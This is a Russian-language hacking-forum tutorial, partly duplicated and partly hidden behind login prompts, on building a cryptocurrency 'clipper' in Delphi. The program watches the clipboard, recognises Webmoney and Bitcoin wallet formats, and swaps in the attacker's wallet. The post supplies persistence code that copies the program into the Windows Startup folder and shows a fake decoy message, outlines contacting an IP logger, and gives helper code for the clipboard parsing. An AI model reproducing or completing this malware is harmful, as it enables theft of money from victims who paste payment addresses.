Вообще от себя хочу сказать , что создать клиппер ну оочень просто.Для этого не надо знать много в ЯП. В связи с этим на форумах очень много расплодилось "тру-кодиров" :Boast которые так и стараются продать вам свой клиппер. Сразу хочу сказать , что все эти три...клиперы работают одинаково , и не стоит верить заголовкам "САМЫЙ лучший трипер только у меня".
Ну , вводная часть закончилась , давайте перейдем к практике. Я покажу самый простой способ создать клиппер.
Немного теории и действий :
А как программка поймет , что в буфере именно кошелек который нам нужен , и что подменять надо именно на соответствующий кошелек.
Ну давайте напримере Webmoney кошелька и буду показывать.
Кодить будем наш трипер на Delphi (не умные люди уже могут кричать , что весь софт написанный не на С++ - гавно :Dwarf)
Ну поехали.
Для уменьшения веса можно юзать Delphi 7
1. Создаем проект с формой (не люблю консольные приложухи :Diablo) и сразу переходим в Project->Views Sourse
Видем код :
После второй строчки вставляем строчку :
После {$R *.res} пишем функцию :
И перед строкой Application.Initialize; мы пишем :
2. Возвращаемся обратно в Unit1> в Uses добавляем ClipBrd,tlhelp32, ShlObj
В общние переменные добавляем :
Настроили , отлично. Логика нашей программы следующая : каждую 0.5 секунды будем получать содержимое буфера -> каждую строчку рабивать на слова -> если слово подходит под правило кошелька webmoney то заменять , если нет , то ничего
[/CODE]
3.
4. Функция проверки слова на правило Webmoney
6. Кидаем на форму таймер , ставим интервал 500 (0.5 сек) , кидаем на форму Memo и в свойствах ScrollBar ставим sBoth. Два клика по таймеру и вставляем код :
Главная мысль этой темы показать , что создавать подобные триперы - легче простого , надо только знать правила создания кошельков да и все.
Добавление в авторан через планировщик , iplogger и т.д - посредственная техническая часть.
Кому что непонятно - пишите в коменты , посмотрим что тут у нас. :Pooh On Ball
Ну , вводная часть закончилась , давайте перейдем к практике. Я покажу самый простой способ создать клиппер.
Немного теории и действий :
- Дропаемся в автозагрузку , стучим в ipploger и т.д
- Мониторим буфер обмена (Ctrl+C)
- Находим совпадение -> подменяем часть текста на нужный нам кошелек.
А как программка поймет , что в буфере именно кошелек который нам нужен , и что подменять надо именно на соответствующий кошелек.
Ответ : каждый кошелек по своему уникален. Например кошельки Webmoney имеют первый символ букву (R,Z и т.д) и дальше 12 цифр. Общая сумма символом Webmoney кошелька - 13 символов (при этом 12 из них цифры , следующие сразу за буквой). Bitcoin кошелек рассказывать не буду , просто прочитайте это из этого скрина
Т.е понимаем , что первый символ у нас либо 1 либо 3 , общее кол-во символов 26-33 (хотя тут на 3,14здят , у биткоин кошелька кол-во символов 33-34 , включая первую цифру.
Точно так-же делается и с другими кошельками - Qiwi , Litecoin , Dogi и т.д. Про правила генерации крипто кошельков можно свободно почитать в гугле. Каждый кошелек создается по своему правилу , и чем больше таких правил вы нагуглите , тем больше у вас будет подмены кошельков. Таким образом программка , мониторя буфер видит сопдание по правилу WEBMONEY кошелька , и такая , АГА , хоба - меняет этот кусок текста на наш вебмани. И так с др кошельками аналогично :Don T Mention
Точно так-же делается и с другими кошельками - Qiwi , Litecoin , Dogi и т.д. Про правила генерации крипто кошельков можно свободно почитать в гугле. Каждый кошелек создается по своему правилу , и чем больше таких правил вы нагуглите , тем больше у вас будет подмены кошельков. Таким образом программка , мониторя буфер видит сопдание по правилу WEBMONEY кошелька , и такая , АГА , хоба - меняет этот кусок текста на наш вебмани. И так с др кошельками аналогично :Don T Mention
Ну давайте напримере Webmoney кошелька и буду показывать.
Кодить будем наш трипер на Delphi (не умные люди уже могут кричать , что весь софт написанный не на С++ - гавно :Dwarf)
Ну поехали.
Для уменьшения веса можно юзать Delphi 7
1. Создаем проект с формой (не люблю консольные приложухи :Diablo) и сразу переходим в Project->Views Sourse
Видем код :
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
Application.CreateForm(TForm1, Form1);
Application.Run;
Для просмотра содержимого вам необходимо авторизоваться.
После {$R *.res} пишем функцию :
Для просмотра содержимого вам необходимо авторизоваться.
И перед строкой Application.Initialize; мы пишем :
Код:
if Check then halt; // защита от повторного запуска
2. Возвращаемся обратно в Unit1> в Uses добавляем ClipBrd,tlhelp32, ShlObj
В общние переменные добавляем :
Код:
na,webmoney,e:string;
pl, ts:TstringList;
Настроили , отлично. Логика нашей программы следующая : каждую 0.5 секунды будем получать содержимое буфера -> каждую строчку рабивать на слова -> если слово подходит под правило кошелька webmoney то заменять , если нет , то ничего
Код:
Автозапуск (самый примитивный , просто дропнемся в папку Автозагрузка , можно юзать и планировщик) . На свойстве OnFormCreate ( или два клика по форме) вставляем код :
[CODE]na:=ParamStr(0);
try
CopyFile(PChar(na), Pchar('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'), false); // копируем
except
end;
MessageBox(0, 'Текст сообщения' , 'Заголовок' , mb_Yes); // фейк сообщение
3.
Код:
function Find(S:string): TStringList;
var i:integer;
S2:string;
// i2:integer;
begin
Result := TStringList.Create;
For i:=1 to Length(S) do
begin
if ( (s[i]<>' ') and (s[i]<>' ') and (s[i]<>' ') ) then S2:=s2+s[i]
else
if s2<>'' then
begin
Result.Add(S2);
S2:='';
end;
end;
if s2<>'' then Result.Add(S2);
end;
4. Функция проверки слова на правило Webmoney
Для просмотра содержимого вам необходимо авторизоваться.
6. Кидаем на форму таймер , ставим интервал 500 (0.5 сек) , кидаем на форму Memo и в свойствах ScrollBar ставим sBoth. Два клика по таймеру и вставляем код :
Для просмотра содержимого вам необходимо авторизоваться.
Главная мысль этой темы показать , что создавать подобные триперы - легче простого , надо только знать правила создания кошельков да и все.
Добавление в авторан через планировщик , iplogger и т.д - посредственная техническая часть.
Кому что непонятно - пишите в коменты , посмотрим что тут у нас. :Pooh On Ball